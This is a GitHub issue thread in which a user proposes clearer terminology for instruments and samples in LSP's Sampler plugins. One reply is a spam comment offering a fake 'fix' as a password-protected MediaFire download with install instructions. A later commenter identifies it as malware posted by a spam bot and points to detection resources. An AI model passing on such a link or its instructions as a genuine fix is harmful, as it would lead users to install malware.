### ISSUE TITLE
Instrument and Sample terminology in Sampler plugins

### ISSUE THREAD

**Issue by audio2000** [lsp-plugins/lsp-plugins#431]
When I first came across these Sampler plugins I originally did not know about the "Multi" versions I only saw the single version.  I had actually originally thought that it was a 8 sample slot sampler, because I was viewing the Sample Matrix as samples and not layers.  It is when I came across the Multi-Sampler when it made more sense to me.

I mean once a user understands the naming convention, this probably is not an issue and also might be too late to change now anyways but
I wonder if maybe a terminology change would be helpful to other users.
Using the Multi-Sampler for this example because it contains both terms.
I kind of see 
"Instruments" as "Samples"
and what is called
"Samples" as "Layers" / "Layer Matrix"
Again this might just be me, I do not think most users are going to care about this, but just thought I would share my experience.

Thank You

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by audio2000** [comment]
I wanted to put this at the top of my original post above, but thought it might be better here.
(now someone just responded possibly incorrectly above?)

Honestly the level of quality that you are providing people is really unbelievable, so I feel weird making any posts on this site because I know very little about this stuff in comparison to you and most people probably using your plugins.
So just keep this in mind as I continue to make some posts here.  I am just sharing how I view certain things but does not mean that they are correct.  My intent is to hopefully help out in any way that I can and just share some opinions/ideas.  Hopefully some of the things I mention will be helpful.

**Comment by iam-py-test** [comment]
@audio2000 they are a known spam bot. The MediaFire link downloads a password-protected archive containing an unknown piece of malware:
https://github.com/hagezi/dns-blocklists/issues/3598
https://www.virustotal.com/gui/file/1f79a95f6bde6c375a9d60dfba8c02fd463d2cbe1d2d7a38eaa0ba403d3529d0/detection
The uBlock Origin team has created a GitHub Actions script to detect and remove these comments: https://github.com/uBlockOrigin/uAssets/blob/master/.github/workflows/on-issue-comment.yml
While it is effective, I am concerned about false positives.
Thanks

**Comment by audio2000** [comment]
Thank you for your response.
I just decided to delete/close this post anyways.
